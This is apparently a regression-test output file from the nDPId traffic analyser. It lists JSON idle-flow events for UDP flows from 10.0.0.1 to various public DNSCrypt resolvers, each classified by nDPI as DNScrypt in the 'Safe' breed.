+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337188,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317494,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317460,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380837,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348913,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348916,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402357,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312464,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312463,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317829,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396069,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 